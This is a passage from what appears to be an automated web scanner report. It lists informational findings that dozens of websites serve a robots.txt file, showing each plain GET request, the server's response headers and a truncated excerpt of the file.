
Severity:	Information
Confidence:	Certain
Host:	http://www.helloatlanta.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.helloatlanta.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/plain
Last-Modified: Mon, 14 Mar 2011 17:53:43 GMT
Accept-Ranges: bytes
ETag: "a7833bc270e2cb1:0"
Server: Microsoft-IIS/7.5
Date: Tue, 03 May 2011 11:20:16 GMT
Connection: close
Content-Length: 2338

#
# robots.txt generated by www.1-hit.com's robot generator
# Please, we do NOT allow nonauthorized robots any longer.
#
User-agent: dotbot
Disallow: /
User-Agent: Gigamega.bot/1.0
Disallow: /
...[SNIP]...

26.499. http://www.henriettesherbal.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.henriettesherbal.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.henriettesherbal.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:34:46 GMT
Server: Apache
Last-Modified: Tue, 21 Sep 2010 16:18:43 GMT
ETag: "49b440c-110c-490c761f23ec0"
Accept-Ranges: bytes
Content-Length: 4364
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 10:34:46 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# robots.txt

User-agent: *
Crawl-delay: 10
# Directories
Disallow: /inc
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /sites/
Disallow: /themes/
# Files
Disa
...[SNIP]...

26.500. http://www.heraldpalladium.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.heraldpalladium.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.heraldpalladium.com

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Content-Type: text/plain
Date: Tue, 03 May 2011 10:15:46 GMT
X-TN-ServedBy: newsys.web.80
Keep-Alive: timeout=300, max=4999
Accept-Ranges: bytes
Last-Modified: Tue, 20 Apr 2010 13:19:22 GMT
Real-Hostname: heraldpalladium.com
Content-Length: 1150
Connection: close
X-Cache-Info: cached

User-agent: Mediapartners-Google*
Disallow: /cgi-bin/
Disallow: /shared-content/
Disallow: /articles/*/*/*/ara/*/*.txt
Disallow: /*.prt$
Disallow: /*.eml$
Crawl-delay: 10

User-agent: Googlebot
Disall
...[SNIP]...

26.501. http://www.herehard.tv/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.herehard.tv
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.herehard.tv

Response

HTTP/1.1 200 OK
Server: nginx/0.8.1
Date: Tue, 03 May 2011 11:25:25 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Mon, 19 Jul 2010 13:18:19 GMT
ETag: "ce90b6-4d-4c44509b"
Accept-Ranges: bytes
Content-Length: 77

User-agent: *
Disallow: /gal.cgi
Sitemap: http://www.herehard.tv/sitemap.xml

26.502. http://www.heresquirt.tv/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.heresquirt.tv
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.heresquirt.tv

Response

HTTP/1.1 200 OK
Server: nginx/0.8.20
Date: Tue, 03 May 2011 11:20:20 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Fri, 20 Nov 2009 12:43:41 GMT
ETag: "13f808a-4f-4b068efd"
Accept-Ranges: bytes
Content-Length: 79

User-agent: *
Disallow: /gal.cgi
Sitemap: http://www.heresquirt.tv/sitemap.xml

26.503. http://www.herkimercountyfair.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.herkimercountyfair.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.herkimercountyfair.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:26:06 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 08 Aug 2006 03:51:34 GMT
ETag: "95f0050-130-41a7982c29d80"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

26.504. http://www.hijackthis.de/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hijackthis.de
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hijackthis.de

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 03 May 2011 11:05:27 GMT
Content-Type: text/plain
Content-Length: 45
Last-Modified: Tue, 03 Nov 2009 18:51:37 GMT
Connection: close
Accept-Ranges: bytes

User-agent: Mediapartners-Google*
Disallow:

26.505. http://www.hiltonhawaiianvillage.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hiltonhawaiianvillage.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hiltonhawaiianvillage.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:40:30 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 10 May 2010 11:34:24 GMT
ETag: "b90278-7c-4863bca6a5000"
Accept-Ranges: bytes
Content-Length: 124
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/

User-agent: googlebot
Disallow: *.csi

26.506. http://www.hintergrund.de/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hintergrund.de
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hintergrund.de

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:29:26 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.17-0.dotdeb.0 with Suhosin-Patch
Last-Modified: Fri, 30 Apr 2010 10:26:23 GMT
ETag: "2656005-16f-48571acc171c0"
Accept-Ranges: bytes
Content-Length: 367
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

26.507. http://www.hireteen.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hireteen.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hireteen.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:24:12 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Accept-Ranges: bytes
Content-Length: 316
Cache-Control: max-age=1
Expires: Tue, 03 May 2011 10:24:13 GMT
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /employers/
Disallow: /jobs/
Disallow: /wp-*
Disallow: /page/
Disallow: /feed
Disallow: /*/trackback
Disallow: /*/feed
Disallow: /*/comments
Disallow: /*?*
Disallow: /*?
Disa
...[SNIP]...

26.508. http://www.hiusa.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hiusa.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hiusa.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:06:59 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 09 Jul 2009 16:08:54 GMT
ETag: "1ae8297-1ba-46e4812813180"
Accept-Ranges: bytes
Content-Length: 442
Access-Control-Allow-Origin: *
Connection: close
Content-Type: text/plain

# Exclude Files From All Robots:

User-agent: *
Disallow: /_ci-1.7.1/codeigniter
Disallow: /_ci-1.7.1/database
Disallow: /_ci-1.7.1/fonts
Disallow: /_ci-1.7.1/helpers
Disallow: /_ci-1.7.1/language
Dis
...[SNIP]...

26.509. http://www.hlj.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hlj.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hlj.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 May 2011 10:29:09 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Vary: Accept-Encoding
Content-Length: 296
Last-Modified: Mon, 23 Jun 2008 02:18:16 GMT
Accept-Ranges: bytes
Expires: Tue, 03 May 2011 11:29:09 GMT
Cache-Control: max-age=3600
X-UA-Compatible: IE=EmulateIE7
Set-Cookie: HLJUserId=22X/QU2/2PUhXh7lECHtAg==; expires=Wed, 02-May-12 10:29:09 GMT; domain=hlj.com; path=/

User-agent: ia_archiver
Crawl-delay: 60
Allow: /

User-agent: Slurp
Crawl-delay: 60
Allow: /

User-agent: Googlebot
Crawl-delay: 10
Allow: /

User-agent: msnbot
Crawl-delay: 10
Allow: /

User-agent: B
...[SNIP]...

26.510. http://www.hobby-hour.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hobby-hour.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hobby-hour.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:30:46 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 07 Oct 2010 16:11:00 GMT
ETag: "4ea00fb-35-4920923cf6d00"
Accept-Ranges: bytes
Content-Length: 53
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /stats/

26.511. http://www.holdonsecuritysite.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.holdonsecuritysite.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.holdonsecuritysite.com

Response

HTTP/1.1 200 OK
Content-Length: 126
Content-Type: text/plain
Last-Modified: Mon, 19 Oct 2009 22:41:58 GMT
Accept-Ranges: bytes
ETag: "0bf955dd51ca1:316"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:29:21 GMT
Connection: close

User-agent: *
Disallow: /images/spacer.gif
Disallow: /ct.html
Disallow: /sd/
Disallow: /st.aspx
Disallow: /ct/ct.aspx

26.512. http://www.holidaycity.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.holidaycity.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.holidaycity.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2678400
Content-Length: 118
Content-Type: text/plain
Last-Modified: Thu, 05 Oct 2006 05:49:50 GMT
Accept-Ranges: bytes
ETag: "fea6911242e8c61:4559"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.www.holidaycity.com/w3c/policy.xml", CP="CAO PSA OUR"
Date: Tue, 03 May 2011 11:17:14 GMT
Connection: close

User-agent: *
Disallow: /hcrs/
Disallow: /cgibin/
Disallow: /scripts/
Disallow: /cos/
Disallow: */default.txt

26.513. http://www.homeawayrealestate.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homeawayrealestate.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homeawayrealestate.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
ETag: "/+8RL+iBTva"
Last-Modified: Tue, 31 Aug 2010 15:52:12 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 90
Date: Tue, 03 May 2011 10:29:17 GMT
Set-Cookie: NSC_IBSF_Qfstjtufodf_Hspvq=ffffffffaf141c9b45525d5f4f58455e445a4a4229a0;path=/;httponly

User-agent: *

Disallow: /dn/

Sitemap: http://www.homeawayrealestate.com/sitemap.xml

26.514. http://www.homebasedofficework.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homebasedofficework.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homebasedofficework.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:11:14 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Fri, 04 Feb 2011 17:43:20 GMT
ETag: "0ac3393c4cb1:4"
Content-Length: 625

# Block a bot that was causing issues by ignoring Disallow lines below
User-Agent: OmniExplorer_Bot
Disallow: /

# Block hotlinking of music files by projectplaylist.com due to perceived user band
...[SNIP]...

26.515. http://www.homedistiller.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homedistiller.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homedistiller.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:43:30 GMT
Server: Apache/2.2.15 (FreeBSD) mod_ssl/2.2.15 OpenSSL/0.9.8n DAV/2 PHP/5.3.2 with Suhosin-Patch
Last-Modified: Wed, 20 Apr 2011 18:09:28 GMT
ETag: "e25b3-6a-4a15d86890600"
Accept-Ranges: bytes
Content-Length: 106
Connection: close
Content-Type: text/plain

User-agent:    *
Disallow:    /cgi-bin

User-agent:    Speedy
Crawl-Delay:    30

User-agent:    HTTrack
Crawl-Delay:    30

26.516. http://www.homefindingbook.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homefindingbook.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homefindingbook.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:41:33 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
Last-Modified: Sat, 24 May 2008 22:58:21 GMT
ETag: "15d268b8-45-48389d8d"
Accept-Ranges: bytes
Content-Length: 69
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /pages
Disallow: /includes
Disallow: /links

26.517. http://www.homegauge.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homegauge.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homegauge.com

Response

HTTP/1.0 200 OK
Server: Resin/3.0.26
P3P: CP="DSP ALL CUR OUR PUBi BUS NAV COM STA INT PHY DEM UNI ONL"
ETag: "6gqVtjHV/1k"
Last-Modified: Tue, 20 Jan 2009 14:49:00 GMT
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 107
Date: Tue, 03 May 2011 10:20:04 GMT

User-agent: *
Disallow: /report/
Disallow: /calendar/
Disallow: /calembed.html
Disallow: /calendar.html

26.518. http://www.homeinfomax.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homeinfomax.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homeinfomax.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:32:29 GMT
Server: Apache
Last-Modified: Thu, 09 Nov 2006 08:31:02 GMT
ETag: "954031-bb-421cc4173dd80"
Accept-Ranges: bytes
Content-Length: 187
Connection: close
Content-Type: text/plain

# : robots.txt
#
# This file is used to allow crawlers to index our site.
# It is NOT used for any other purpose, such as filtering
# impressions or clicks.

User-agent: *

Disallow:

26.519. http://www.homelifeweekly.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homelifeweekly.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homelifeweekly.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:27:04 GMT
Server: Apache
X-Pingback: http://www.homelifeweekly.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.homelifeweekly.com/sitemap.xml.gz

26.520. http://www.homepage-baukasten.de/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homepage-baukasten.de
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homepage-baukasten.de

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:27:24 GMT
Server: Apache
Last-Modified: Wed, 12 May 2010 12:07:09 GMT
ETag: "8a6c9-19-486647b389540"
Accept-Ranges: bytes
Content-Length: 25
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=ISO-8859-15

User-Agent: *
Allow: /

26.521. http://www.hostesscakes.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hostesscakes.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hostesscakes.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 19 Aug 2009 04:20:55 GMT
Accept-Ranges: bytes
ETag: "5e2d6718420ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:33:30 GMT
Connection: close
Content-Length: 1432

User-Agent: *

#expired promotions
Disallow: /strikeitrich
Disallow: /santaclaus.asp
Disallow: /images/bio
Disallow: /tf_hostess_rebate.pdf
Disallow: /downloads
Disallow: /promotions/don
...[SNIP]...

26.522. http://www.hotcelebrity.name/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hotcelebrity.name
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hotcelebrity.name

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:59:36 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
X-Pingback: http://hotcelebrity.name/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

26.523. http://www.hotelbluemb.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hotelbluemb.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hotelbluemb.com

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: text/plain
Content-Location: http://www.hotelbluemb.com/robots.txt
Last-Modified: Tue, 13 Oct 2009 13:05:07 GMT
Accept-Ranges: bytes
ETag: "502bac954cca1:1ea38b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:36:01 GMT
Connection: close

User-agent: *
Allow: /

Sitemap: www.hotelbluemb.com/sitemap.xml

26.524. http://www.hotmamamature.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hotmamamature.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hotmamamature.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:17:07 GMT
Server: Apache
Last-Modified: Thu, 23 Apr 2009 05:09:16 GMT
ETag: "240fcb0-88-46831e1b0f700"
Accept-Ranges: bytes
Content-Length: 136
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /cpx.php
Disallow: /medios1.php
Disallow: /toolbar.php
Disallow: /check_image.php
Disallow: /check_popunder.php

26.525. http://www.hrs.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hrs.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hrs.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Thu, 28 Apr 2011 08:39:16 GMT
Content-Type: text/plain
Date: Tue, 03 May 2011 10:25:54 GMT
Content-Length: 2308
Connection: close

User-agent: *
Sitemap: http://www.hrs.com/sitemap.xml
Allow: /hotels/
Disallow: /?
Disallow: /*jsessionid
Disallow: /web3/hotelData.do?
Disallow: /CVS/
Disallow: /IPX/
Disallow: /ad-hrs/
Disallow: /ae
...[SNIP]...

26.526. http://www.htmate2.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.htmate2.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.htmate2.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:21:31 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 14 May 2006 03:56:50 GMT
ETag: "1475c0d6-11e-413b78f3e2480"
Accept-Ranges: bytes
Content-Length: 286
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /mambots/
D
...[SNIP]...

26.527. http://www.htmlgoodies.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.htmlgoodies.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.htmlgoodies.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 10 Feb 2011 21:05:35 GMT
ETag: "24c-49bf3f153c5c0"
Content-Type: text/plain; charset=UTF-8
Cache-Control: public, max-age=5620
Date: Tue, 03 May 2011 10:58:31 GMT
Content-Length: 588
Connection: close

Sitemap: http://www.htmlgoodies.com/sitemap.xml
Disallow: /RealMedia/ads/
Disallow: /ads/
Disallow: /fcgi-bin/ipeclick.cgi/
Disallow: /event.ng/
Disallow: /html.ng/
Disallow: /click.ng/
Disallow: /ima
...[SNIP]...

26.528. http://www.hymnary.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hymnary.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hymnary.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:24:08 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 01 Sep 2009 12:17:48 GMT
ETag: "172000f-4df-4728323751300"
Accept-Ranges: bytes
Content-Length: 1247
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 11:24:08 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin
Disallow: /mediawiki/
Disallow: /wiki/Special:Search
Disallow: /wiki/Special:Random
Disallow: /ThML
DIsallow: /bible
Disallow: *osisRef=
Disallow: *sub=
# Disallow: *s
...[SNIP]...

26.529. http://www.iberia.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.iberia.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.iberia.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:33:51 GMT
Content-length: 2932
Content-type: text/plain
Last-modified: Thu, 07 Apr 2011 08:27:22 GMT
Connection: close

User-Agent: *
Disallow: /default.htm
Disallow: /default.html
Disallow: /OneToOne/v3/paHomeTicketPage.do
Disallow: /OneToOne/gateway_es.jsp
Disallow: /qos.html
Disallow: /notfound.html
Disallow: /discu
...[SNIP]...

26.530. http://www.iciba.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.iciba.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.iciba.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Tue, 03 May 2011 10:56:56 GMT
Content-Type: text/plain
Content-Length: 105
Last-Modified: Tue, 03 Nov 2009 03:36:44 GMT
Connection: close
Accept-Ranges: bytes

# robots.txt file from http://www.iciba.com
# All robots will spider the domain

User-agent: *
Disallow:

26.531. http://www.idahopress.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.idahopress.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.idahopress.com

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=900
X-TNCMS-Memory-Usage: 2050656
Content-Type: text/plain; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 11:37:16 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0575
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: idahopress.com
X-TNCMS-Served-By: cmsapp1
Content-Length: 1679

User-agent: MSNBot
Crawl-delay: 3
Disallow: /content/tncms/live/
Disallow: /content/tncms/ads/
Disallow: /search/?
Disallow: /*?mode=print
Disallow: /*?print
Disallow: /*?mode=story
Disallow:
...[SNIP]...

26.532. http://www.idahoptv.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.idahoptv.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.idahoptv.org

Response

HTTP/1.1 200 OK
Content-Length: 1819
Content-Type: text/plain
Content-Location: http://www.idahoptv.org/robots.txt
Last-Modified: Tue, 25 Jan 2011 15:36:44 GMT
Accept-Ranges: bytes
ETag: "08e50aba5bccb1:112c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:35:29 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin/
Disallow: /articles/
Disallow: /111/
Disallow: /scripts/
Disallow: /hold/
Disallow: /images/
Disallow: /fpimages/
Disallow: /imagesfp/
Disallow: /icons/
Dis
...[SNIP]...

26.533. http://www.idigmygarden.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.idigmygarden.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.idigmygarden.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:39:07 GMT
Server: Apache
Last-Modified: Mon, 30 Jun 2008 23:24:02 GMT
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.534. http://www.imageenvision.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.imageenvision.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.imageenvision.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:25:36 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.9
Last-Modified: Thu, 11 Feb 2010 09:28:59 GMT
ETag: "ab60002-e4-47f4fc7daecc0"
Accept-Ranges: bytes
Content-Length: 228
Vary: Accept-Encoding
Cache-Control: max-age=172800, public, must-revalidate
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/order.pl
Disallow: /cgi-bin/order.pl?do=order

Sitemap: <http://www.imageenvision.com/site_map_individual_photo_pages.xml>
Sitemap: <http://www.imageenvision.com/site_
...[SNIP]...

26.535. http://www.imagetextile.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.imagetextile.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.imagetextile.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:18:18 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: max-age=3600, private
Expires: Tue, 03 May 2011 12:18:18 GMT
Last-Modified: Tue, 19 Apr 2011 05:05:08 GMT
Accept-Ranges: bytes
Content-Length: 344
Connection: close
Content-Type: text/plain

User-agent: *
# Cap is html
Disallow: /cgi-bin/
Disallow: /RT/
Disallow: /TG/
Disallow: /QS/
Disallow: /wgl/
Disallow: /P/
Disallow: /ymix/
Disallow: /OS/
Disallow: /cs/
Disallow: /en=
Disallow: /p/s=
...[SNIP]...

26.536. http://www.immunize.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.immunize.org
Path:	/favicon.ico

Issue detail

